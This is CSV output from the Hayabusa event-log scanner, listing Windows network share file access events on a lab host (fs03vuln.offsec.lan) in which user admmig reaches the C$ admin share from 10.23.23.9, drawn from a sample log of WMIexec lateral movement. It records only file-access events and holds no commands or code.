2021-04-22 20:32:32.015 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.W69ef49d2#\3904c1c8a3c65252ed404558b48ebbc1 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:32.015 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.W71daf281# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:32.015 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.W71daf281#\4dc6f876453e5e2ebf2a9ee674543449 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:32.015 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.W81a3882f# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:32.031 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.W81a3882f#\a85f95161dcf12987a79a1b41adbdb9c | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:32.031 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.W708fc392# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:32.031 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.W708fc392#\8f2dcf5025667bf632e62398c422a6da | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:32.031 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.W5052cbb1# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:32.031 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.W5052cbb1#\3d4dc36b565611250515cd25ebe64bed | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:32.050 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.W57798b05# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:32.050 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.W57798b05#\a9ccbdffc3a6a0fca980872c1531aa02 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:32.050 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.W73044bb5# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:32.050 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.W73044bb5#\ca9e965c5eab4b76dc40c510a6a4a916 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:32.050 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.W193497eb# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:32.050 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.W193497eb#\2ebfdca668bed840047e6bcbeec44e53 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:32.064 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.W08054466# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:32.064 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.W08054466#\728711ada9b68483d998f34ac723c295 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:32.064 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Wad38fd8b# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:32.064 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Wad38fd8b#\9158e541821e2b6d43c32648464e77c2 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:32.079 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Wad78daf4# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:32.079 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Wad78daf4#\81b597084cf1f78a1957cf8138744f32 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:32.096 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admmig\desktop.ini | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:32.099 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Wb2d030b7# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:32.099 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Wb2d030b7#\fa5c1a0df187c30480b0623065a70395 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:32.099 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Wb2d06916# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:32.099 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Wb2d06916#\d61b7f885a9fd4f4766031b996ca7d6a | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:32.099 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Wb9b5bb58# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:32.114 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admmig | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:32.114 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Wb9b5bb58#\094367b5bb80758c8f0ab02018658d91 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:32.130 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: USERS\ADMMIG | IP Addr: 10.23.23.9 | LID: 0x18b247,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:32.130 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admmig\Contacts\desktop.ini | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:32.130 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admmig | IP Addr: 10.23.23.9 | LID: 0x18b247,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:32.130 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admmig | IP Addr: 10.23.23.9 | LID: 0x18b247,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:32.130 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admmig\Desktop\desktop.ini | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:32.130 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Wbc80354b# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:32.130 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admmig\Documents\desktop.ini | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:32.130 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Wbc80354b#\1dd94a4862b69a4583662583681346ca | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:32.145 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admmig\Downloads\desktop.ini | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:32.145 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Wc1cc6649# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:32.145 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admmig\Favorites\desktop.ini | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:32.145 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Wc1cc6649#\c869d6724028906387ff9f65e11cd9a4 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:32.145 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admmig\Links\desktop.ini | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:32.145 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Wca5f1176# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:32.145 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admmig\Music\desktop.ini | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:32.145 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Wca5f1176#\0e765b6e054c8bac98f30ced03330615 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:32.145 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admmig\Pictures\desktop.ini | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:32.145 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Wcffedcb4# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:32.145 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admmig\Saved Games\desktop.ini | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:32.145 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Wcffedcb4#\37b337245bcc60a0f8c6cc814157fd9f | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:32.161 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admmig\Searches\desktop.ini | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:32.161 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Wd75d181a# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:32.161 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admmig\Videos\desktop.ini | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:32.161 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Wd75d181a#\ff89d7fa29ebae7dfdd1cf2db43686dc | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:32.161 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Wd518ee0d# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:32.161 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Wd518ee0d#\0658126a7d3bc7b0e7f548f2e3a423fb | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
